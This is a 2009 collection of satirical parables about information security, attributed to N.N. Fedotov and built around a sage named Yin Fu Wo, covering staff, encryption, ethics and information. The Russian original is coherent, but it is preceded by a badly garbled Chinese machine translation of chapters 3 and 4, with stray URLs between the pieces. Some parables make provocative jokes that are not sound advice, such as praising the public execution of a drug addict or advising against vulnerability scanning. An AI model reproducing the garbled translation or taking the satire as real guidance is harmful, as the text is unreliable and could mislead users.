- 我明白了。 在許多情況下,安全事件 - 是基本力。 而且它是任何人的錯。
在殷夫搖了搖頭:
- 不是真的。 這起雨真的沒有人的錯。 但是,如果有地震,摧毀建築,這是站立,然後有一個故障。 他將受到懲罰。
查把你留下了深深的沉思。

3.9

老師說:
- 知識在這種武器的信息安全。 是否戰鬥機拒絕分享他的武器到另一個誰願意來保護他們的土地? 而我們 - 戰爭。

3.10

一旦殷夫的防火牆阻止了多個IP地址時。 系統管理員向他詢問原因。 老師說:
- 以防萬一。 我看到程序的無法解釋的行為。
- 也許這只是一個小故障? - 建議系統管理員。
在殷夫說:
- 我們每個人都面臨著有時會莫名。 如果不理解的精髓,每一個表演自己。 系統管理員 - kamlat一個手鼓。 把你的工程師查 - 喝啤酒,重裝系統。 而我 - 我開始懷疑奸詐的敵人的行動。
把你的工程師查聽到的談話,他說:
- 這類似於偏執狂。
- 偏執狂是我的職責之一 - 大師說。

3.11

當古老的後衛尹來了黑客的攻擊。
- 哦,一個明智的陰, - 他說 - 教我他的藝術。
- 在此之前,你必須通過測試。 破解這台計算機 - 和尹福在寫在一張IP地址的。
- 但是,這是我自己的電腦! - 黑客驚訝。
- 這是正確的 - 證實了老師。 - 你要破解它,您不使用已知的密碼。
黑客1小時應付的考驗。
- 我教你, - 說,延傅博。
三年後,主再次給了黑客相同的任務。 黑客無法實現它。
- 現在,你的訓練結束後, - 說,延傅博。

3.12

在殷夫說:
- 信息Defender不會消除威脅。 它分佈人與人之間的威脅。 從不太信任,更多的信任。

3.13

初級會計師李滄問:
- 主,為什麼我們的工程師被稱為JA取出(奓蟁)? 護照,他查速嗯(奓誦)之後。
在殷夫說:
- 看他,他是什麼孫? 當他失去了客戶數據,它會禁用交換機上的端口,並且客戶端等待來電。 那麼,什麼是他對太陽?


[5]服務質量,服務質量 -系統流量整形

第4章信息


4.1

當軍隊進行了一次加息警告南蠻,到殷夫變成了政府官員。 他說:
- 珍貴edinochayatel陰幫助我們保持在互聯網上的信息戰。
在殷夫說:
- 互聯網 - 詞。 當它來到管教武力,訓誡的話了。

4.2

把你的工程師查問老師關於虐待的服務。 在殷夫說:
- 有必要寫投訴的接待和處理的情況。
- 為什麼? - 把你查說。 - 是不是足夠的只是跟隨道?
- 無勇氣儀式導致叛亂。 真不儀式導致粗魯。 富達不儀式導致屈從, - 大師說。 - 而如果沒有儀式的信息安全造成連接丟失。

4.3

一個導演叫防信息洩漏的會議。 當其他官員報導,在殷夫說:
- 安全部門的負責人寫10000行命令和指示的。 同時,他認為人的機器。 因此,不執行其指令。 系統管理員寫了77規則DLP系統。 他認為汽車被遺忘的人。 因此,它的規則將損害企業。
- 在這種情況下, - 說主任 - 讓他們一起工作。 我們創建了一整套組織和技術措施得到落實,將有助於業務。
在殷夫搖了搖頭:
- 兩個獨臂將無法拍攝一鞠躬。

4.4

把你查說:
- 可以在Windows PC得到保護?
- 原則上, - 說,延傅博。
- 而在實踐中?
久負盛名的後衛尹看了一個筆記本電腦,查取出拿在手裡,然後說:
- 它發生,總統令的裝甲豪華轎車。 但是,對於更好的戰士坦克。

4.5

系統管理員問尹福在大約知識產權。 老師說:
- 偉大的作品屬於天堂。 好的作品是屬於大家的。 由公司擁有的壞作品。
更多的系統管理員詢問有關DRM [6],和複製保護。 在殷夫說:
- 保護工作,是它的拷貝。 複製禁止 - 禁止保護。

4.6

一旦談話已經對家長控制。 弟子問殷夫在:
- 我一定要限制孩子訪問包含暴力內容?
老師說:
- 做父母的沒有暴力就會滋生,不能夠暴力。 人民是沒有能力的暴力行為,這將無法生存包圍的野蠻部落。
更多的弟子問:
- 我一定要限制孩子訪問包含色情內容?
- 這是不可能限制訪問總是隨身攜帶。
更多的弟子問:
- 我一定要限制孩子的訪問內容與宣傳毒品?
- 宣傳禁止的禁止 - 這是不合理的宣傳,宣傳的禁令。 公開處決癮君子做一萬多ACL的好[7]。

4.7

系統管理員問大師:
- 西方野蠻人為什麼保護個人數據? 資源的這種愚蠢的浪費!
- 在古代,野蠻人相信這個人的名字的知識,讓你強加給他的詛咒, - 說,延傅博。
系統管理員感到驚訝:
- 但他們不再是一個狂野知道魔術不存在。
- 是的,他們已經知道了 - 確認主陰。 - 不過,雖然他們住在曠野,藏他們的名字,他們不得不建立依賴於個人數據的保密制度。 現在,他們也沒辦法。
- 這是件好事,我們是文明的人不相信巫術 - 說系統管理員。
殷夫在傷心地笑了:
- 由於擔心巫術,野蠻人那樣神奇的現實。 知道了這一點,您可以命名一個人偷了他的錢[8]。

4.8

查說,聽老師:
- 我可以閱讀別人的電子郵件,以防止洩漏?
- 你知道,有 - 他回答。
- 但是,通訊設施擁有的公司。 這意味著,所有的信息在其中 - 太多。
在殷夫搖了搖頭:
- 每天提供午餐,你從該公司獲得了一大杯米飯。 還有誰擁有你的生活?

4.9

一旦在吃飯的系統管理員問殷夫在:
- 主,你為什麼每天早上花半小時來研究日誌? 是不是最好把自動分析?
尹師傅指著筷子,說:
- 你可能已經聽說了北方蠻族不知道棍子。 他們吃他們的食物以湯匙。 而使用自動分析儀日誌。 因此,它們的壽命的持續時間為小,而且很容易打入他們的服務器。
更多關於殷夫說:
- 一個西方野蠻人已經採取武器。 他們不記錄學習。 因此,他們都是醜陋的脂肪,而且他們的服務器 - 一個公共通道。 我們,在對比的是野蠻人,我們用筷子吃飯。
系統管理員悠閒地吃著蝦和開明的左飯來讀取日誌。

4.10

弟子問殷夫在互聯網的未來。 老師說:
- 已經一去不復返了賣家知識的日子。 現在是時候不願透露姓名的銷售商。 認識 - 價格便宜,隱藏 - 它的價格昂貴。


[6] DRM -數字版權管理。
[7]訪問控制列表 -訪問控制列表。

你可以發表評論在這裡

©2009 N.N.Fedotov。
允許複製和傳播,以全部或部分工程的市民,與強制引用特定網頁或企業博客InfoWatch的。


 =====
 http://forensics.ru/InFuWo.htm#_ftnref2

Суждения об информационной безопасности
мудреца и учителя Инь Фу Во[1],
записанные его учениками

Глава 1. О работниках


1.1

Однажды Сисадмин пожаловался Учителю:
– Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают хранить их в тайне. Записывают на листочках и приклеивают к мониторам. Что нам делать? Как заставить их?
Инь Фу Во спросил:
– Сначала скажи, почему они это делают.
Сисадмин подумал и ответил:
– Может быть, они не считают пароль ценным?
– А разве пароль сам по себе ценный?
– Не сам по себе. Ценна информация, которая под паролем.
– Для кого она ценна?
– Для нашего предприятия.
– А для пользователей?
– Для пользователей, видимо, нет.
– Так и есть, – сказал Учитель. – Под паролем нет ничего ценного для наших работников. Надо, чтоб было.
– Что для них ценно? – спросил Сисадмин.
– Догадайся с трёх раз, – рассмеялся Учитель.
Сисадмин ушёл просветлённый и сделал на корпоративном портале персональные странички для всех работников. И на тех страничках был указан размер зарплаты. Узнав об этом, все пользователи забеспокоились о своих паролях. На другой день в курилке обсуждали размер зарплаты Главбуха. На третий день ни у кого не было видно листочков с паролями.

1.2

Однажды Сисадмин пожаловался Учителю:
– Наш Техдиректор не хочет выполнять требования безопасности. Всем положено иметь антивирус, а он не ставит. Как на него повлиять?
– Попробуй его убедить, – сказал Инь Фу Во.
Сисадмин ушёл убеждать, но вскоре вернулся разочарованным:
– Я не смог убедить его, Учитель.
– Почему так случилось? – спросил Инь Фу Во и сразу же заметил. – Но только ответь честно, без пристрастия и обиды.
Сисадмин подумал, опустил глаза и тихо сказал:
– Наверное потому, что он знает об информационной безопасности больше меня.
– Ну, если Техдиректор знает больше тебя, что совсем не удивительно, – заметил Учитель, – то ему виднее, где нужен антивирус, а где нет.
– А как же тогда Политика безопасности! – воскликнул Сисадмин.
– А кто писал эту Политику?
Сисадмин потупился и сказал:
– Я.
Учитель мудро промолчал, и Сисадмин ушёл просветлённый.

1.3

Однажды в курилке пользователи стали возмущаться, что Сисадмин закрыл всем доступ на сайт "Одноклассники". Инь Фу Во услышал об этом и нахмурился.
– Почему ты закрыл людям доступ? – спросил он у Сисадмина, когда они после перекура пили кофе.
– Потому что такие сайты не нужны для работы.
– А курить нужно для работы?
– Вообще-то нет...
– А кофе пить?
– Ну...
– Ну тогда, – сказал Учитель, – открой людям доступ.

1.4

Однажды Сисадмин захотел установить в локальной сети сканер безопасности.
Инь Фу Во сказал:
– Не делай этого.
– Но почему?
– В нашей сети сто компьютеров. Сканер найдёт тебе по две-три уязвимости на каждом из них.
– Ну, да, найдёт...
– А что ты будешь делать с этими уязвимостями?
Сисадмин задумался и ничего не ответил Учителю. Сканер безопасности он не поставил.

1.5

Однажды Сисадмин пожаловался Учителю:
– Антивирус не помогает. Установлен на всех рабочих станциях и обновляется дважды в день. А всё равно каждую неделю кто-то заражается и теряет данные.
Инь Фу Во с сожалением покачал головой.
– Надо что-то делать, – продолжал Сисадмин.
Учитель слегка покивал. Сисадмин спросил:
– Что лучше: поставить всем новый многоядерный антивирус или поднять централизованную систему бэкапа?
Инь Фу Во ответил:
– Проведи курсы для пользователей.

1.6

Однажды Директор решил взять на работу Эникейщика. Инь Фу Во нашёл кандидата, поговорил с ним и остался доволен. Он сказал Директору:
– Этот человек обратил свои помыслы к учёбе. Возможно, из него получится достойный работник.
Но начальник службы безопасности стал возражать:
– У этого человека была судимость. Его нельзя брать на службу.
Тогда Инь Фу Во спросил:
– Как вы узнали об этом?
– У меня есть связи.
Почтенный Инь помрачнел лицом и сказал Директору:
– Какой из двух работников более добродетельный? Первый совершил преступление и понёс заслуженное наказание, которое могло его вразумить. Второй совершил преступление сам, подбил на совершение преступления государственного служащего, при этом не чувствует за собой вины и никогда не понесёт наказания? Какой из этих двух достоин выдвижения?
Начальник службы безопасности молча встал и вышел.

1.7

Однажды Директор спросил Инь Фу Во про защиту от внутренних угроз. Тот сказал:
– Во внешнем мире есть сто человек, которые хотели бы заполучить конфиденциальную информацию из вашей сети. И есть пять, которые способны это сделать. Но эти сто вряд ли встретятся с этими пятью.
Ещё Учитель сказал:
– А в вашей внутренней сети есть пять пользователей, которые хотели бы заполучить конфиденциальную информацию. И есть сто, которые могут это сделать. И они уже встретились.

1.8

Однажды Директор пришёл к защитнику Иню за советом. Директор сказал:
– Я хотел бы заставить всех пользователей соблюдать строгие правила безопасности. Но тогда они обидятся на меня и станут хуже работать. Я хотел бы дать пользователям полную свободу. Но тогда они нахватают вирусов, разгласят конфиденциальную информацию, и наш бизнес пострадает. Как мне найти золотую середину?
Инь Фу Во ответил:
– Высота забора равна высоте самого низкого участка. Прочность цепи равна прочности слабейшего звена. Заставь самых нерадивых из пользователей соблюдать те правила безопасности, которые без принуждения соблюдают все остальные.
– Как просто! – воскликнул Директор и ушёл просветлённый.

1.9

Директор спросил почтенного Иня:
– Мне предлагают купить систему защиты от несанкционированного доступа. Стоит ли она денег, которые за неё просят?
Инь Фу Во в ответ спросил:
– Сколько у вас было случаев несанкционированного доступа за последние три года?
– Ни одного, – ответил Директор.
– А сколько ноутбуков и флэшек потеряли ваши работники за это время?
– Два ноутбука, – ответил Директор, – а флэшки никто не считал.
– Почему бы вместо этого не купить систему для шифрования информации на ноутбуках и флэшках? – сказал Инь Фу Во.

1.10

Однажды Директор спросил почтенного защитника Иня про защиту от внутренних угроз. Тот сказал:
– Внутренний враг бывает злонамеренный и неосторожный. Неосторожный враг подобен каплям дождя, что многочисленны и летят по воле ветра. От дождя легко заслониться зонтом. Злонамеренный враг подобен комару, который кусает в незащищённое место. Заслониться от него зонтом нельзя.
Директор ещё спросил:
– А какой инсайдер хуже, злонамеренный или неосторожный?
Инь Фу Во ответил:
– Нельзя так ставить вопрос. Оба они хуже.

1.11

Как-то Сисадмин спросил:
– Учитель, не желаете ли красивую картинку для вашего десктопа? У меня есть коллекция "обоев для рабочего стола" со звёздным небом и моральным законом.
– Почему ты думаешь, что мой нынешний "wallpaper" хуже? – спросил в ответ Инь Фу Во.
– Я не знаю, какая у вас картинка сейчас. Я никогда не видел вашего десктопа. У вас всегда открыто множество окон.
– Я тоже его никогда не видел, – сказал почтенный Инь. – Я работаю.

1.12

Однажды младший бухгалтер Ли Чан принесла в дар Инь Фу Во кактус.
– Поставьте его возле вашего монитора, Учитель, – сказала она. – Этот кактус защитит вас от вредного излучения.
– Отнеси его Сисадмину, – сказал Инь Фу Во. – Мне кактус не поможет.
– Почему? – обиженно спросила Ли Чан.
– Для него нет драйвера под FreeBSD, – ответил Учитель.

1.13

Однажды в офис забрёл продавец дешёвых и некачественных товаров из провинции Сяньган. Он ходил по комнате и пытался каждому что-нибудь продать.
Инь Фу Во сказал Сисадмину:
– Ты всегда говоришь и пишешь в блоге, что спамеров нужно убивать. Смотри, это – спамер.
– Это не тот спамер, – пробормотал Сисадмин.
– Ты даже охрану не позовёшь? – ехидно спросил Учитель.
Сисадмин ничего не ответил. Он увлечённо долбил по клавиатуре.

1.14

Сисадмин спросил Учителя:
– В статье написано, что любое усиление безопасности снижает лояльность работников. Это правда?
Инь Фу Во ответил:
– На самом деле усиление безопасности снижает удобство. Снижение удобства повышает усталость. Повышение усталости снижает добросовестность. А снижение добросовестности работников – это и есть то, чего следует избегать.
– Тогда что же такое лояльность? – спросил Сисадмин.
– "Лояльность", – усмехнулся Инь Фу Во, – это японцы выдумали, чтоб денег не платить.

1.15

Однажды Сисадмин пожаловался Учителю:
– Наш Директор совершенно не разбирается в ИТ. Я не могу ему объяснить. И его указания всегда такие нелепые.
Инь Фу Во ответил:
– Это нормальный порядок вещей. Его забота – люди и деньги. Твоя забота – техника и программы. Вы разговариваете на разных языках.
Сисадмин согласился и спросил:
– Как нам изучить язык друг друга?
– Это почти невозможно, – сказал Учитель. – Для этого Директору пришлось бы несколько лет проработать сисадмином, но он не пожелает. Для этого тебе пришлось бы несколько лет проработать руководителем, но тебя не допустят.
– Как же понять друг друга тем, кто говорит на разных языках? – спросил Сисадмин.
Инь Фу Во ответил:
– Специально для этих целей создан промежуточный язык, доступный обоим. Имя ему – "ГОСТ-17799".
– Как просто! – воскликнул Сисадмин и ушёл просветлённый.


[1] Инь Фу Во (廕傁幄) – почтенный защитник Инь.

Глава 2. О шифровании


2.1

Однажды Сисадмин спросил почтенного защитника Иня:
– Учитель, почему вы не пользуетесь ЭЦП?
– У надёжных средств ЭЦП нет сертификата. У сертифицированных нет удобства. У удобных нет надёжности, – ответил Инь Фу Во.

2.2

Инь Фу Во два дня настраивал VPN-туннель для своего персонального компьютера. Когда туннель заработал, Инь уселся, почтительно повернувшись лицом к югу, и стал читать свою френдленту.
– О, Учитель, – спросил его Сисадмин, – я не могу понять, зачем вам VPN?
– Ты разве не знаешь, что в VPN-туннеле весь трафик шифруется? – удивился Инь.
– Знаю. Но ваш туннель терминируется на обычном сервере в стране западных варваров. А далее весь ваш яшмовый трафик идёт по Сети в открытом виде.
– Сети нет дела до моего трафика, чего не скажешь о провайдере, – ответил Учитель. Видя, что Сисадмин не понял, он добавил. – Вот, например, ты доверил свои деньги банку.
Сисадмин кивнул.
– Но ты не можешь доверить все свои деньги собственной супруге, – продолжал мудрый Инь. – Почему? Потому что она может посчитать эти деньги своими. А с банком такого не случится.
Просветлённый Сисадмин ушёл поднимать себе VPN-туннель.

2.3

Сисадмин спросил Инь Фу Во:
– Правда ли, что любой шифр можно сломать?
Учитель ответил:
– Можно. Но не "шифр", а систему из четырёх: алгоритм, реализация[2], окружение[3] и оператор.
Сисадмин ещё спросил:
– А что из этих четырёх самое непрочное?
– Стыки между ними, – ответил Учитель.

2.4

Однажды к почтенному защитнику Иню обратился Следователь. Он спросил:
– Учитель, вы сможете расшифровать криптоконтейнер PGPdisk без знания пароля?
– Не смогу, – ответил Инь Фу Во. – И никто другой не сможет.
– Тогда горе мне! – воскликнул Следователь. – Тогда у меня нет доказательств.
– Увидев запертый замок, обычный человек желает заглянуть внутрь. Но благородный муж знает, что самое ценное лежит не под замком, – сказал Учитель. – Что именно вы желаете доказать?
– Нарушение авторских прав на программы.
– Оставьте криптоконтейнер в покое, – ответил Учитель. – Свидетельских показаний будет более чем достаточно.

2.5

Инь Фу Во сказал:
– Шифрование – это обмен большого секрета на маленький секрет. Этот маленький должен помещаться в голове. Когда пароль в голове держится хуже, чем в компьютере, шифрование не приносит пользы.

2.6

Однажды Сисадмин и инженер Чжа Вынь почтительно приблизились к Учителю, и Сисадмин сказал:
– Мой единочаятель Вынь утверждает, что во всех обнародованных криптографических программах есть "чёрный ход", сделанный спецслужбами. А я полагаю, что это не так. Кто из нас прав?
Инь Фу Во ответил:
– С этого вопроса начинают свой путь все инженеры и все сисадмины. Тот, кто утвердил для себя ответ на него, навсегда остановился и не может следовать Дао. Однако и пренебрегать этим вопросом тоже не верно.
Потом почтенный Инь продолжил:
– У северных варваров есть такая легенда. Грозный и мудрый Тигр, царь зверей повелел Лису построить утиную ферму. Глупый Лис при строительстве сделал для себя тайный ход, чтобы воровать государственных уток. И, конечно же, сразу попался. Тигр велел казнить обманщика и таким образом сэкономил деньги на строительство. Не думай, драгоценный Вынь, что спецслужбы подобны глупому Лису. Но и ты – отнюдь не мудрый Тигр, царь зверей.
Ученики ушли просветлённые. Сисадмин после этого вообще отказался от шифрования своего диска. А инженер Чжа Вынь сделал криптоконтейнер внутри криптоконтейнера.

2.7

Сисадмин желал подобрать себе стойкий пароль для централизованной авторизации через radius-сервер. Он обратился за советом к Инь Фу Во.
– Как вы думаете, Учитель, пароль "史達林格勒戰役" стойкий?
Нет, – ответил мастер Инь, – это словарный пароль.
– Но такого слова нет в словарях...
– "Словарный" означает, что это сочетание символов есть в wordlists, то есть "словарях" для перебора, которые подключаются к программам криптоанализа. Эти словари составляются из всех сочетаний символов, которые когда-либо встречались в Сети.
– А пароль "Pft,bcm" подойдёт?
– Вряд ли. Он тоже словарный.
– Но как же? Это же...
– Введи это сочетание в Гугле – и сам увидишь.
Сисадмин защёлкал клавишами.
– О, да. Вы правы, Учитель.
Через некоторое время Сисадмин воскликнул:
– Учитель, я подобрал хороший пароль, которого не может быть в словарях.
Инь Фу Во кивнул.
– Я ввёл его в Гугле, – продолжал Сисадмин, – и убедился, что в Сети такого сочетания нет.
– Теперь есть.

2.8

Однажды инженер Чжа Вынь обратился к Учителю:
– Один достойный уважения человек сказал мне, что шифровать электронную почту неправильно. Поскольку честному человеку нечего скрывать, шифрованная переписка неизбежно привлечёт внимание Охранительного ведомства. Учитель, что вы об этом думаете?
Инь Фу Во ответил:
– Благородный муж имеет чувство стыдливости. Он закрывает одеждой свою наготу. Вовсе не потому, что лицезрение другими принесёт ему ущерб. Но такова воля Неба, и таков ритуал. Честному человеку есть, что скрывать.

2.9

Инженер Чжа Вынь долго сидел над проектом, а потом пожаловался Учителю:
– Не могу примирить бэкап и шифрование. Всё время одно мешает другому.
Инь Фу Во ответил:
– Они непримиримы. Шифрование защищает конфиденциальность. Резервное копирование защищает доступность. Конфиденциальность и доступность – это разные защиты.
– Но как же быть тогда? – спросил Чжа Вынь. – Здесь нужна и конфиденциальность, и доступность.
– Пусть одна будет внутри другой. Пусть первая не знает про вторую.
Инженер Чжа Вынь спросил Учителя:
– Что значит резервирование внутри шифрования?
– Пусть все файловые системы будут зашифрованы, а файлы будут бэкапиться с одной на другую, – ответил Инь Фу Во.
Ещё Чжа Вынь спросил:
– Что значит шифрование внутри резервирования?
– Делай резервную копию криптоконтейнера как файла, – ответил Инь Фу Во.

2.10

Директор сказал:
– Зачем нам шифровать содержимое дисков? Зачем нам VPN? У нас нет противозаконной информации.
Мудрый Инь Фу Во ответил:
– Безгрешность – не результат праведности, а результат наивности.


[2] Инь Фу Во имеет в виду программу, которая производит шифрование и расшифровывание по алгоритму.
[3] Инь Фу Во называет окружением операционную систему, в которой работает шифрующая программа и сам компьютер, то есть аппаратную платформу.

Глава 3. Об этике


3.1

Сисадмин спросил:
– Учитель, можно ли блэкхолить[4] трафик в случае DoS-атаки?
– Иногда можно, – ответил Инь Фу Во.
– А в каких случаях?
– В каких случаях доктор может причинить вред своему пациенту? – спросил в ответ Учитель.
– Наверное, когда предотвращённый вред превышает вред причинённый, – ответил Сисадмин, подумав.
– Теперь спрошу другое, – продолжил Учитель. – В каких случаях доктор может причинить вред постороннему человеку?
– Я не знаю таких случаев, – ответил Сисадмин.
– Вот теперь ты готов блэкхолить нужный трафик, – кивнул Учитель.
И Сисадмин ушёл просветлённый.

3.2

Инь Фу Во, проходя по офису, взглянул на мониторы сотрудников. Пробравшись на своё рабочее место, он изрёк:
– Наш инженер Чжа Вынь сейчас настраивает QOS[5]. Он думает, что взаимодействует с техникой, а на самом деле – с людьми. Наша бухгалтер Ли Чан сейчас чатится по ICQ. Она думает, что общается с человеком, а на самом деле – с программой.
– Учитель, а почему ваш монитор развёрнут экраном к стенке? – спросила Ли Чан.
– Чтобы всё время видеть людей, – ответил Учитель.

3.3

Инженер Чжа Вынь хотел работать в отделе информационной безопасности. Инь Фу Во сказал ему:
– Ты ещё не готов. Ты представляешь себя воином сети. А нам нужен доктор сети.

3.4

Однажды инженер Чжа Вынь сообщил:
– Я нашёл уязвимость в программе «Лин». Что вы об этом думаете, Учитель?
– Надо сообщить Производителю.
Через некоторое время Чжа Вынь снова пришёл к почтенному защитнику Иню.
– Я написал об уязвимости Производителю. Мне ответили, что закроют уязвимость только в следующей версии. Она выйдет через полгода.
Инь Фу Во помрачнел:
– Напиши им, что мы опубликуем эту уязвимость ровно через две недели.
Через три дня вышел патч к программе «Лин».
– А если бы они не выпустили патч? – спросил Сисадмин Учителя. – Вы бы позволили Чжа Выню опубликовать найденную уязвимость?
Инь Фу Во мягко улыбнулся и сказал:
– Нет. Дао информационной безопасности тем и прекрасен, что по нему нельзя идти в одиночку. Как только ты опередил других, другие ускоряют шаг. Как только ты оторвался от других, ты покинул Дао.

3.5

Прочитав статью в журнале, Учитель заметил:
– Человек не есть «слабейшее звено в информационной безопасности». Человек вообще не есть звено.

3.6

Однажды Сисадмин спросил:
– Учитель, вы всегда говорите, что надо делиться знаниями в области защиты информации со всеми, кто пожелает учиться.
Инь Фу Во кивнул. Сисадмин продолжал:
– Но ведь бывают и опасные знания! Особенно знания в информационной безопасности.
Инь Фу Во воскликнул:
– Опасные знания?! Знание опасно для того, кто им НЕ обладает.

3.7

Однажды Техдиректор прислал почтенному Иню вопрос по электронной почте. Учитель ответил на него, поместив в письмо фрагмент конфига. Кроме конфига и подписи в ответе ничего не было.
Сисадмин, который получил копии обоих писем, спросил:
– Учитель, почему вы поместили в письмо только несколько команд, но не добавили ни единого слова?
Инь Фу Во в ответ процитировал своего учителя:
– «Я не хочу говорить. Разве Небо говорит? А между тем времена года исправно сменяют друг друга»

3.8

Инженер Чжа Вынь спросил:
– Следует ли при защите информации стремиться к возмездию? Или мы должны использовать только пассивную защиту?
– Смотря, кто противник, – ответил Учитель. – Если тебя кусает комар, его следует прихлопнуть. Если на тебя капает дождь, следует прикрыться зонтом.
– Я понял. Во многих случаях инцидент безопасности – это стихийная сила. И в нём никто не виноват.
Инь Фу Во покачал головой:
– Не совсем. В том, что пошёл дождь, действительно никто не виноват. Но если случилось землетрясение, и разрушилось здание, которое должно было устоять, то здесь есть виноватый. И его накажут.
Чжа Вынь ушёл в задумчивости.

3.9

Учитель сказал:
– Знание в ИБ подобно оружию. Неужели боец откажется поделиться своим оружием с другим, который хочет защищать свою землю? А ведь мы – в состоянии войны.

3.10

Однажды Инь Фу Во заблокировал на межсетевом экране несколько IP-адресов. Сисадмин спросил его о причинах. Учитель сказал:
– На всякий случай. Я увидел необъяснимое поведение программ.
– Может быть, это просто глюк? – предположил Сисадмин.
Инь Фу Во ответил:
– Каждый из нас иногда сталкивается с необъяснимым. Не поняв сути, каждый действует по-своему. Сисадмин – камлает с бубном. Инженер Чжа Вынь – пьёт пиво и переинсталлирует систему. А я – начинаю подозревать действия коварного врага.
Инженер Чжа Вынь, услышав разговор, заметил:
– Это похоже на паранойю.
– Паранойя входит в число моих должностных обязанностей, – ответил Учитель.

3.11

Однажды к почтенному защитнику Иню пришёл Хакер.
– О, мудрый Инь, – сказал он, – обучи меня своему искусству.
– Перед этим тебе придётся пройти испытание. Взломай вот этот компьютер, – и Инь Фу Во написал на листке IP-адрес.
– Но это же мой собственный компьютер! – удивился Хакер.
– Именно так, – подтвердил Учитель. – Ты должен взломать его, не используя известные тебе пароли.
Хакер за один час справился с испытанием.
– Я буду учить тебя, – сказал Инь Фу Во.
Через три года Учитель снова дал Хакеру такое же задание. Хакер не смог его выполнить.
– Теперь твоё обучение закончено, – сказал Инь Фу Во.

3.12

Инь Фу Во сказал:
– Защитник информации не ликвидирует угрозы. Он перераспределяет угрозы между людьми. От менее доверяемых к более доверяемым.

3.13

Младший бухгалтер Ли Чан спросила:
– Учитель, почему нашего инженера все зовут Чжа Вынь (奓蟁)? Ведь по паспорту он Чжа Сунь (奓诵).
Инь Фу Во ответил:
– Взгляни на него, какой же он Сунь? Когда он теряет данные о клиенте, он отключает порт на коммутаторе и ждёт от клиента звонка. Ну какой же он Сунь?


[4] от "blackhole", что означает маршрутизацию соответствующего трафика в /dev/null
[5] QOS, quality of service – система приоритезации трафика


Глава 4. Об информации


4.1

Когда армия отправилась в поход вразумлять южных варваров, к Инь Фу Во обратился государственный чиновник. Он сказал:
– Драгоценный единочаятель Инь, помогите нам вести информационную войну в Интернете.
Инь Фу Во ответил:
– Интернет – это слова. Если дело дошло до вразумления силой оружия, вразумление словами закончилось.

4.2

Инженер Чжа Вынь спросил Учителя про abuse service. Инь Фу Во сказал:
– Надо написать положение о приёме и обработке жалоб.
– Зачем? – спросил Чжа Вынь. – Разве недостаточно просто следовать Дао?
– Храбрость без ритуала ведёт к бунту. Правдивость без ритуала ведёт к грубости. Верность без ритуала ведёт к подхалимству, – ответил Учитель. – А информационная безопасность без ритуала ведёт к потере связности.

4.3

Однажды директор собрал совещание о борьбе с утечками информации. Когда другие сотрудники доложили, Инь Фу Во сказал:
– Начальник Службы безопасности написал десять тысяч строк приказов и инструкций. При этом он думал о людях как о машинах. Поэтому его инструкции не будут исполняться. Сисадмин написал семьдесят семь правил для DLP-системы. При этом он думал о машинах и забыл о людях. Поэтому его правила пойдут во вред бизнесу.
– В таком случае, – сказал Директор, – пусть они работают вместе. Пусть создадут комплекс организационных и технических мер, которые будут исполняться и будут способствовать бизнесу.
Инь Фу Во покачал головой:
– Двое одноруких не смогут стрелять из лука.

4.4

Чжа Вынь спросил:
– Может ли компьютер с Windows быть защищённым?
– В принципе, может, – ответил Инь Фу Во.
– А на практике?
Почтенный защитник Инь взглянул на ноутбук, который Чжа Вынь держал в руке, потом сказал:
– Бывает, что для президента делают бронированный лимузин. Но для воина лучше танк.

4.5

Сисадмин спросил Инь Фу Во про интеллектуальную собственность. Учитель сказал:
– Великие произведения принадлежат Небу. Хорошие произведения принадлежат людям. Плохие произведения принадлежат корпорациям.
Ещё Сисадмин спросил про DRM[6] и защиту от копирования. Инь Фу Во ответил:
– Защита произведения и заключается в его копировании. Запрет копирования – это запрет защиты.

4.6

Однажды разговор зашёл про родительский контроль. Ученики спросили Инь Фу Во:
– Нужно ли ограничивать доступ детей к контенту, содержащему насилие?
Учитель ответил:
– Воспитание без насилия даст поколение, не способное к насилию. А народ, не способный к насилию, не выживет в окружении варварских племён.
Ещё ученики спросили:
– Нужно ли ограничивать доступ детей к контенту, содержащему эротику?
– Невозможно ограничить доступ к тому, что всегда носишь с собой.
Ещё ученики спросили:
– Нужно ли ограничивать доступ детей к контенту с пропагандой наркотиков?
– Запрет пропаганды запретного – это столь же неразумно, как пропаганда запрещения пропаганды. Одна публичная казнь наркомана приносит больше пользы, чем десять тысяч ACL[7].

4.7

Сисадмин спросил Учителя:
– Зачем западные варвары защищают персональные данные? Такая неразумная трата ресурсов!
– В древности варвары верили, что знание настоящего имени человека позволяет наложить на него проклятье, – ответил Инь Фу Во.
Сисадмин удивился:
– Но ведь они давно уже не дикие и знают, что колдовства не существует.
– Да, они уже знают, – подтвердил мастер Инь. – Но пока они жили в дикости и скрывали свои имена, успели построить систему, которая опирается на конфиденциальность персональных данных. Теперь у них нет другого пути.
– Хорошо, что мы цивилизованные люди и не верим в колдовство, – заметил Сисадмин.
Инь Фу Во печально улыбнулся:
– Опасаясь колдовства, варвары сделали колдовство реальностью. Знание настоящего имени человека позволяет украсть его деньги[8].

4.8

Чжа Вынь спросил Учителя:
– Можно ли читать чужую электронную почту ради предотвращения утечек?
– Ты сам знаешь, что нет, – был ответ.
– Но ведь средства связи принадлежат предприятию. Значит и все сообщения в них – тоже.
Инь Фу Во покачал головой:
– Каждый день в обед ты получаешь от предприятия большую чашку риса. Кому же принадлежит твоя жизнь?

4.9

Как-то за обедом Сисадмин спросил Инь Фу Во:
– Учитель, почему вы каждое утро тратите полчаса на изучение логов? Не лучше ли поставить автоматический анализатор?
Мастер Инь показал на палочки для еды и сказал:
– Ты, возможно, слышал, что северные варвары не знают палочек. Они едят свою пищу ложками. И используют автоматические анализаторы логов. Поэтому срок их жизни мал, а их сервера нетрудно взломать.
Ещё Инь Фу Во сказал:
– А у западных варваров принято есть руками. И логов они вообще не изучают. Поэтому все они безобразно толстые, а их сервера – проходной двор. Мы, в отличие от варваров, кушаем палочками.
Сисадмин неторопливо доел рис с креветками и просветлённый ушёл читать логи.

4.10

Ученики спросили Инь Фу Во о будущем Интернета. Учитель сказал:
– Прошли времена продавцов знаний. Пришли времена продавцов анонимности. Узнавать – дёшево, скрывать – дорого.


[6]   DRM – технические средства защиты авторских прав.
[7]   Access control list — список управления доступом.
[8]   Очевидно, Инь Фу Во имеет в виду имя в совокупности с номером соцстрахования (Social Security Number).



комментировать можно здесь

© Н.Н.Федотов, 2009.
Допускается воспроизведение и доведение до всеобщего сведения настоящего произведения полностью или частями, с обязательной ссылкой на данную веб-страницу или на корпоративный блог компании
 =====
 http://www.freebuf.com/articles/web/11687.html

